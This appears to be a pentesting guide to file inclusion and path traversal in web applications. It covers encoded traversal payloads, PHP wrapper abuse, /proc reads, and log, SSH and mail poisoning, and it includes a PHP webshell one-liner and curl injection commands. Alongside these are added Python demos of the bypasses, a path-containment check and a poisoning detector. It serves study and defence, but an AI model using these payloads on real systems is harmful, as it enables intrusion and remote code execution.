File Inclusion and Path Traversal - Web Applications Pentesting

File Inclusion and Path Traversal

At a Glance

File Inclusion

File inclusion is the mechanism by which applications and scripts include local or remote files at run time. The vulnerability occurs when an application builds the path of the code it includes from an attacker-controlled variable, giving the attacker control over which file is executed.

There are two types. Local File Inclusion (LFI), where the application includes files that already exist on the server, and Remote File Inclusion (RFI), where the application downloads and executes files from a remote server. 1

Path Traversal

A path, or directory, traversal attack exploits weak validation or sanitization of user-supplied data to read files or directories outside the directory the application is meant to serve from.

These techniques may lead to information disclosure, cross-site scripting (XSS) and remote code execution (RCE). 2


Basic LFI

Absolute Path Traversal

Relative Path Traversal

Null Byte

Sometimes applications append extra characters, such as a file extension, to the input variable. A null byte (%00) terminates the string at the C level, so everything appended after it is ignored.

Note: PHP fixed this in version 5.3.4; since then the file functions reject any path that contains a null byte.

Dot Truncation

In PHP, a filename longer than 4096 bytes is truncated and the characters after that point, including an appended extension, are ignored. Pad the path with repeated dots until it passes the limit ([ADD MORE] stands for "keep repeating the padding"):

../../../../../etc/passwd........[ADD MORE]

Note: In PHP, /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ when the path is resolved for inclusion.


Manipulating variables that reference files with "dot-dot-slash" (../) sequences and their encoded variants, or using absolute file paths, may bypass poorly implemented input filtering. 3

Char | URL | Double URL | UTF-8 (overlong)        | 16-bit Unicode
.    | %2e | %252e      | %c0%2e %e0%40%ae %c0%ae | %u002e
/    | %2f | %252f      | %c0%2f %e0%80%af %c0%af | %u2215
\    | %5c | %255c      | %c0%5c %c0%80%5c        | %u2216

The overlong UTF-8 forms are invalid UTF-8 and only work against decoders that accept non-shortest encodings. %u2215 and %u2216 are the Unicode DIVISION SLASH and SET MINUS characters, which some parsers fold to / and \.

Encoded ../

%2e%2e%2f
%2e%2e/
..%2f

Encoded ..\

%2e%2e%5c
%2e%2e\
..%5c

Double URL Encoding

%252e%252e%252f

UTF-8 Encoding

%c0%ae%c0%ae%c0%af

Bypass Filtering

Bypass ../ removal

If the filter strips ../ only once (non-recursively), nesting the sequence leaves a valid ../ behind after the filter has run:

....//....//etc/passwd

Bypass ../ replaced with ;
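The following is an added example, not code from the original page: it shows how the encodings in the table above and the nested ....// trick defeat four common traversal filters, and contrasts them with a containment check that holds up. The web root, the filters and all paths are constructed for the demonstration.

```python
"""Added example (not from the original page): how the encodings in the table
above defeat four common traversal filters, and the containment check that
does not. Web root and paths are constructed for the demo."""
import posixpath
from urllib.parse import unquote, unquote_to_bytes

# Encodings of '.' and '/' from the table above. The overlong UTF-8 forms are
# invalid UTF-8; they only work against decoders that accept non-shortest forms.
DOT = {"plain": ".", "url": "%2e", "double_url": "%252e", "utf8_overlong": "%c0%ae"}
SLASH = {"plain": "/", "url": "%2f", "double_url": "%252f", "utf8_overlong": "%c0%af"}


def dotdotslash(scheme: str, depth: int = 3) -> str:
    """'../' repeated `depth` times in the chosen encoding."""
    return (DOT[scheme] * 2 + SLASH[scheme]) * depth


def tolerant_utf8(data: bytes) -> str:
    """Deliberately lenient two-byte UTF-8 decoder, the kind of bug that made
    %c0%ae work on old IIS: it never rejects overlong sequences."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def strict_utf8_rejects(path: str) -> bool:
    """A correct decoder refuses the overlong bytes instead of mapping them."""
    try:
        unquote_to_bytes(path).decode("utf-8")
        return False
    except UnicodeDecodeError:
        return True


# Four filters, each modelling a real mistake. Each returns the string the
# application would pass on to the file API.
def filter_strip_once(path: str) -> str:
    """Removes '../' non-recursively, so '....//' collapses to '../'."""
    return path.replace("../", "")


def filter_check_then_decode(path: str) -> str:
    """Looks for '../' in the raw value, then URL-decodes it for use."""
    if "../" in path:
        raise ValueError("traversal detected")
    return unquote(path)


def filter_double_decode(path: str) -> str:
    """Server decodes once, application decodes again: %252e -> %2e -> '.'"""
    return unquote(unquote(path))


def filter_lenient_unicode(path: str) -> str:
    """Percent-decodes to bytes, then runs the lenient UTF-8 decoder."""
    return tolerant_utf8(unquote_to_bytes(path))


WEBROOT = "/var/www/html/pages"  # constructed web root


def resolve(base_dir: str, user_path: str) -> str:
    """The file the server would actually open: join, then normalise."""
    return posixpath.normpath(posixpath.join(base_dir, user_path))


def bypass_results() -> dict:
    """Feed each filter the encoding it fails on; every one ends at /etc/passwd."""
    tail = "etc/passwd"
    return {
        "strip_once": resolve(WEBROOT, filter_strip_once("....//" * 4 + tail)),
        "check_then_decode": resolve(WEBROOT, filter_check_then_decode(dotdotslash("url", 4) + tail)),
        "double_decode": resolve(WEBROOT, filter_double_decode(dotdotslash("double_url", 4) + tail)),
        "lenient_unicode": resolve(WEBROOT, filter_lenient_unicode(dotdotslash("utf8_overlong", 4) + tail)),
    }


def is_contained(base_dir: str, user_path: str) -> bool:
    """The check that holds up: decode exactly as the application will,
    normalise, then require the result to still sit under the base directory.
    (In production resolve both sides with os.path.realpath so symlinks
    cannot escape either; posixpath is used here so the demo needs no files.)"""
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(posixpath.join(base, unquote(user_path)))
    return posixpath.commonpath([base, target]) == base
```

Note that the containment check compares with commonpath rather than startswith: /var/www/html/pages2/x starts with /var/www/html/pages but is not inside it.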


Windows UNC Share 4

On Windows, a UNC path can be injected to redirect file access to a share the attacker controls:

\\<host>\share\<file>



Most of the filter-bypass techniques for LFI also apply to RFI.

Basic RFI

Null Byte

Bypass http(s):// removal


Bypass allow_url_include

On Windows, disabled allow_url_include and allow_url_fopen can be bypassed with SMB: a UNC path is a local path as far as PHP is concerned, so simply include a script hosted on an open share (the host was omitted on the original page):

\\<host>\share\shell.php

PHP Stream Wrappers

PHP provides many built-in wrappers for various protocols to use with file functions such as fopen, copy, file_exists and filesize. 5 include and require use the same wrappers; the remote ones (http://, ftp://, data://, php://input) are only honoured by include when allow_url_include=On, while php://filter, zip:// and plain paths are not affected by that setting.


php://filter is a meta-wrapper that applies filters to a stream before its content is read. Used with include, the result is the encoded source of the given file rather than the output of executing it, which is why it is used to read PHP source (configuration files, credentials) without running it.

Note: Multiple filters can be chained on one path, separated by | (in the read= form) or by /.

Filter string.rot13.

php://filter/read=string.rot13/resource=<file>

Filter convert.base64.

php://filter/convert.base64-encode/resource=<file>

Filter chaining zlib.deflate and convert.base64, which shrinks the output (useful for large files or length-limited parameters).

php://filter/zlib.deflate/convert.base64-encode/resource=<file>

Base64 decode and gzip inflate.

The resulting encoded string can be decoded and inflated by piping it into the following PHP one-liner (gzinflate reads the raw DEFLATE stream that zlib.deflate produces):

echo [BASE64-STR] | php -r 'echo gzinflate(base64_decode(file_get_contents("php://stdin")));'
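As an added example (not code from the original page), the following Python builds the php://filter paths for the three chains above and decodes what each returns, so source pulled through an LFI can be recovered offline. SAMPLE_PHP is a constructed file; the PHP side of each chain is emulated so the example runs without a target.

```python
"""Added example (not from the original page): builds the php://filter paths
used above and decodes what each chain returns. SAMPLE_PHP is constructed."""
import base64
import codecs
import zlib

SAMPLE_PHP = "<?php\n$db_pass = 'constructed-sample-secret';\ninclude($_GET['page']);\n"


def filter_path(resource: str, *filters: str) -> str:
    """php://filter/<f1>/<f2>/resource=<file>. PHP also accepts the
    read=<f1>|<f2> spelling; the '/'-separated form is shorter in a URL."""
    return "php://filter/" + "/".join(filters) + "/resource=" + resource


# What PHP hands back for each chain, emulated so the example is offline.
def php_rot13(src: str) -> str:
    return codecs.encode(src, "rot_13")


def php_base64(src: str) -> str:
    return base64.b64encode(src.encode()).decode()


def php_deflate_base64(src: str) -> str:
    """zlib.deflate emits a raw DEFLATE stream with no zlib/gzip header;
    wbits=-15 selects exactly that, matching PHP's gzdeflate/gzinflate."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(c.compress(src.encode()) + c.flush()).decode()


# Attacker-side decoding.
def decode_rot13(blob: str) -> str:
    return codecs.decode(blob, "rot_13")


def decode_base64(blob: str) -> str:
    return base64.b64decode(blob).decode()


def decode_deflate_base64(blob: str) -> str:
    """Python equivalent of: php -r 'echo gzinflate(base64_decode(...));'"""
    return zlib.decompress(base64.b64decode(blob), -15).decode()


def demo(src: str = SAMPLE_PHP) -> dict:
    """Round-trip every chain: the filter path to request, whether the source
    survived decoding, and the size of the encoded blob (deflate matters
    for long files)."""
    chains = {
        "string.rot13": (php_rot13, decode_rot13),
        "convert.base64-encode": (php_base64, decode_base64),
        "zlib.deflate/convert.base64-encode": (php_deflate_base64, decode_deflate_base64),
    }
    out = {}
    for name, (enc, dec) in chains.items():
        blob = enc(src)
        out[name] = {
            "path": filter_path("<file>", *name.split("/")),
            "ok": dec(blob) == src,
            "size": len(blob),
        }
    return out
```

Any of the three chains stops the server from executing the file: rot13 turns the opening tag into <?cuc, and the other two produce no tag at all.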


zip:// is a wrapper for reading members of a zip archive. To use it, upload a zip containing the PHP script (under whatever extension the upload filter accepts) and include the member through zip://<zipfile>#<file>, where <file> is the name of the script inside the archive. The # must be sent URL-encoded as %23, otherwise the client drops it as a URL fragment and it never reaches the server.

echo -n "<?php system(\$_GET['c']); ?>" > shell.php
zip shell.jpg shell.php

zip://<zipfile>%23shell.php


data:// is a wrapper for the RFC 2397 data: scheme. It allows small data items to be supplied inline as if they were an external file, so the script itself travels in the URL. Inclusion through data:// requires allow_url_include=On. 6

PHP shell script, base64-encoded so that it can be placed in the URL (the +, / and = characters of the base64 output still need to be URL-encoded in a query string):

echo -n "<?php system(\$_GET['c']); ?>" | base64

data://text/plain;base64,[BASE64-STR]


The expect:// wrapper provides access to a process's stdin, stdout and stderr via a PTY, so expect://<command> runs <command>. It is not available by default: it needs the expect PECL extension.


php://input is a read-only stream that returns the raw request body, so the code can be sent as the POST body while the included path is php://input. Requires allow_url_include=On. The target URL was omitted on the original page:

curl -X POST --data "<?php echo shell_exec('ls'); ?>" '<url>' -v

The proc File System

The proc file system (procfs) contains a hierarchy of special files that represent the current state of the kernel. It acts as an interface to the kernel's internal data structures for applications and users.

Because of this abstract nature it is also referred to as a virtual file system.

Files in this directory are listed as zero bytes in size even though they can return a large amount of data. 7

Process Directories

The /proc directory contains one subdirectory for each process running on the system, named after the process ID (PID). Each of these directories in turn contains files with information about that process. 8

/proc/self (fs/proc/self.c)

/proc/self is a symbolic link to the /proc/[PID] directory of whichever process is reading it. For an LFI this means it always points at the web server or PHP worker handling the request, so no PID has to be guessed.

It is maintained by the kernel, which resolves the link target to the caller's PID at lookup time.

Useful /proc entries

  • /proc/version: Kernel version.
  • /proc/sched_debug: Scheduling information and running processes per CPU.
  • /proc/mounts: Mounted file systems.
  • /proc/net/arp: ARP table.
  • /proc/net/route: Routing table.
  • /proc/net/tcp and /proc/net/udp: Active TCP or UDP sockets (addresses and ports are hex-encoded).
  • /proc/net/fib_trie: Routing tables trie. 9

Useful /proc/[PID] entries

  • /proc/[PID]/cmdline Process invocation command with its arguments, NUL-separated (they appear run together in a browser).

    It potentially exposes paths, usernames and passwords.

  • /proc/[PID]/environ Environment variables, NUL-separated.

    It potentially exposes paths, usernames and passwords.

  • /proc/[PID]/cwd Symbolic link to the process's current working directory.

  • /proc/[PID]/fd/[#] File descriptors.

    One symbolic link per file the process has open; reading the link through the LFI reads that file.

LFI2RCE - /proc


/proc/self/environ contains request-derived values, which turns it into useful volatile storage: Apache exports the HTTP_USER_AGENT header as an environment variable for its modules, and in CGI/FastCGI setups it ends up in the PHP process environment. 10 The file has to be readable by the web server user, and the URL was omitted on the original page.

curl -A "<?php system(\$_GET['c']); ?>" '<url>' -v

Then include /proc/self/environ with the command in the c parameter.

/proc/[PID]/fd/[FD] 3

  1. Upload a lot of shells.

  2. Include /proc/$PID/fd/$FD.

    Each fd entry is a symbolic link to whatever file that descriptor has open, so brute-force the process ID ($PID) and file descriptor number ($FD) until one resolves to a file holding the shell.

LFI2RCE - Log Poisoning

A log file contains a record of events from an application. A log poisoning attack consists of triggering one of these events with executable code as part of the logged data and then, through LFI, including the log so the code is executed.

It is recommended to load the target log through the inclusion first, both to verify that it is readable and to identify which fields are being stored.

Administrators can change the logged fields (LogFormat) to their needs, so the defaults below may not apply.

By default, Apache maintains an access log and an error log. The error log commonly records the Referer header (for example on a 404: "File does not exist: ..., referer: ..."), while the access log records the User-Agent. 11

Access Log

Make a valid request with the code in the User-Agent header (the URL was omitted on the original page):

curl -A "<?php system(\$_GET['c']); ?>" '<url>' -v

Error Log

Make an invalid request, for example for a file that does not exist, with the code in the Referer header:

curl -e "<?php system(\$_GET['c']); ?>" '<url>' -v

The Apache logging API escapes the strings it writes to the logs.

Use single quotes (') in the payload: a double quote (") is logged as \" and a backslash as \\, which breaks the PHP syntax once the log is included.
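As an added example (not code from the original page), the following Python emulates the escaping Apache applies to logged request fields (an approximation of ap_escape_logitem() in server/util.c) so a payload can be checked before it is sent, and then scans Combined Log Format lines for payloads that did land, which is the same check from the detection side. The log lines are constructed.

```python
"""Added example (not from the original page): approximates Apache's
ap_escape_logitem() so a log-poisoning payload can be checked before sending,
then scans constructed Combined Log Format lines for payloads that landed."""
import re

_SIMPLE = {'"': '\\"', "\\": "\\\\", "\n": "\\n", "\r": "\\r", "\t": "\\t",
           "\b": "\\b", "\v": "\\v"}


def apache_escape_logitem(s: str) -> str:
    """Approximation of server/util.c ap_escape_logitem(): quotes, backslashes
    and common whitespace get a backslash, other non-printables become \\xHH."""
    out = []
    for ch in s:
        if ch in _SIMPLE:
            out.append(_SIMPLE[ch])
        elif ord(ch) < 0x20 or ord(ch) > 0x7E:
            out.append("\\x%02x" % (ord(ch) & 0xFF))
        else:
            out.append(ch)
    return "".join(out)


def payload_survives(payload: str) -> bool:
    """True only if the logged bytes are identical to what was sent, i.e. the
    PHP will parse the same way when the log is included."""
    return apache_escape_logitem(payload) == payload


# Detection side: Combined Log Format, allowing escaped quotes inside fields.
_CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "((?:[^"\\]|\\.)*)" (\d{3}) \S+ '
                  r'"((?:[^"\\]|\\.)*)" "((?:[^"\\]|\\.)*)"$')
_PHP_TAG = re.compile(r"<\?(php|=)", re.I)

SAMPLE_LOG = [  # constructed lines
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system(\'id\'); ?>"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /doesnotexist HTTP/1.1" 404 196 "<?php system(\\"id\\"); ?>" "curl/8.0"',
]


def find_poisoning(lines: list) -> list:
    """(client, field) for every request whose Referer or User-Agent carries a
    PHP open tag. The escaped-quote line is still reported: it failed as a
    payload, but it is an attempt worth alerting on."""
    hits = []
    for line in lines:
        m = _CLF.match(line)
        if not m:
            continue
        client, _request, _status, referer, agent = m.groups()
        for field, value in (("referer", referer), ("user_agent", agent)):
            if _PHP_TAG.search(value):
                hits.append((client, field))
    return hits
```

The third sample line is what the double-quoted payload from the note above looks like once Apache has escaped it: PHP would see system(\"id\") and fail to parse.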


Common Apache Log Paths

Log files can also be set to custom locations, either globally or per domain if virtual hosting is enabled. Default locations by distribution:

/var/log/apache2/access.log        Debian, Ubuntu
/var/log/apache2/error.log
/var/log/httpd/access_log          RHEL, CentOS, Fedora
/var/log/httpd/error_log
C:\xampp\apache\logs\access.log    XAMPP on Windows
C:\xampp\apache\logs\error.log

SSH logs the username of each connection attempt, including invalid ones. Connect to the target's SSH service with the code as the username (the host was omitted on the original page):

ssh "<?php system('id'); ?>"@'<host>'

Common SSH Log Paths

/var/log/auth.log    Debian, Ubuntu
/var/log/secure      RHEL, CentOS, Fedora

Email an internal account with the script in the subject; the message is stored in that user's mailbox spool, commonly /var/mail/<user> or /var/spool/mail/<user>, which is the file to include. The host was omitted on the original page:

mail -s "<?php system(\$_GET['c']); ?>" "www-data@<host>" < /dev/null


Further Reading

  1. Contributors to Wikimedia projects. "File Inclusion Vulnerability - Wikipedia." Wikipedia, the Free Encyclopedia, Wikimedia Foundation, Inc., 24 Nov. 2006.

  2. "Path Traversal - OWASP." OWASP.

  3. swisskyrepo. "PayloadsAllTheThings / Directory Traversal." GitHub.

  4. "CWE-40: Path Traversal: '\UNC\share\name\' (Windows UNC Share) (4.1)." CWE - Common Weakness Enumeration.

  5. "PHP: Supported Protocols and Wrappers - Manual." PHP: Hypertext Preprocessor.

  6. "RFC 2397 - The 'Data' URL Scheme." IETF Tools.

  7. "The /proc Filesystem." The Linux Kernel Documentation.

  8. "proc(5) - Linux Manual Page." Michael Kerrisk, man7.org.

  9. Bernat, Vincent. "IPv4 Route Lookup on Linux." Vincent Bernat.

  10. "LFI2RCE (Local File Inclusion to Remote Code Execution) Advanced Exploitation: /proc Shortcuts." Ush.it.

  11. "Log Files - Apache HTTP Server Version 2.4." The Apache HTTP Server Project.